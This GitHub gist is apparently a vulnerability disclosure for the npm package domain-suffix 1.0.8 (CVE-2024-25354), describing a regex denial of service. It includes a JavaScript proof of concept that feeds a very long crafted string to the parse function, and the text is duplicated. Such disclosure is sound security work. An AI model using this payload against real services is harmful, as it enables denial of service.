6en6ar/gist:c3b11b4058b8e2bc54717408d451fb79

## gistfile1.txt
Product: https://www.npmjs.com/package/domain-suffix
Version: 1.0.8
Vulnerability type: Denial of Service
CVE ID: CVE-2024-25354

The regex defined on line 28. inside https://github.com/ikrong/domain-suffix/blob/master/src/domainSuffix.ts
is vulnerable to Regex Denial of Service. When a long string is provided to the application without specifying "/" character
the function parse will be stuck for indefinite amount of time,  in this case 10 seconds, but this can be
amplified if more characters are added.
PoC code:

const DomainSuffix = require("domain-suffix").domainSuffix;
console.time('[ + ] Time passed -> ');

var payload = "aA".repeat(95500) + '/Aa\';
let result = DomainSuffix.parse("https://" + payload)
if(result){
 let {suffix,domain} = result;
 console.log(suffix,domain);
}else{
 console.log("cannot parse");
}

console.timeEnd('[ + ] Time passed -> ');
	Product: https://www.npmjs.com/package/domain-suffix
	Version: 1.0.8
	Vulnerability type: Denial of Service
	CVE ID: CVE-2024-25354

	The regex defined on line 28. inside https://github.com/ikrong/domain-suffix/blob/master/src/domainSuffix.ts
	is vulnerable to Regex Denial of Service. When a long string is provided to the application without specifying "/" character
	the function parse will be stuck for indefinite amount of time, in this case 10 seconds, but this can be
	amplified if more characters are added.
	PoC code:

	const DomainSuffix = require("domain-suffix").domainSuffix;
	console.time('[ + ] Time passed -> ');

	var payload = "aA".repeat(95500) + '/Aa\';
	let result = DomainSuffix.parse("https://" + payload)
	if(result){
	let {suffix,domain} = result;
	console.log(suffix,domain);
	}else{
	console.log("cannot parse");
	}

	console.timeEnd('[ + ] Time passed -> ');